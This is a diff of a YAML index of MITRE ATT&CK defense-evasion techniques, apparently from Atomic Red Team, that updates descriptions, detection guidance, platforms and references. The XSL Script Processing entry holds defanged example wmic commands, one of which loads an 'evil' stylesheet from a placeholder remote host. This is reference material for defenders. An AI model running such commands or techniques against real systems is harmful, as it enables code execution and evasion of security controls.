-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -17097,6 +17354,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -17111,21 +17371,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -17170,9 +17461,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -17229,8 +17519,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -17239,57 +17529,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -17307,29 +17551,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -17362,7 +17650,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -17390,8 +17678,6 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests:
     - name: Create a hidden file in a hidden directory
@@ -17412,42 +17698,7 @@ defense-evasion:
         name: sh
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -17456,6 +17707,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -17464,20 +17718,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -17534,6 +17819,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -17544,13 +17830,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -17609,11 +17894,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -17653,8 +17937,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -17662,13 +17948,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -17699,9 +17985,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1480.001:
@@ -17762,7 +18045,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -17784,11 +18067,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -17855,8 +18137,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -17874,7 +18156,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -17977,12 +18258,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -17995,6 +18275,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -18031,17 +18312,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -18087,9 +18368,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -18127,7 +18405,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -18146,7 +18424,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -18177,7 +18454,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -18201,12 +18478,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -18290,7 +18565,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -18312,7 +18586,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -18346,12 +18620,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
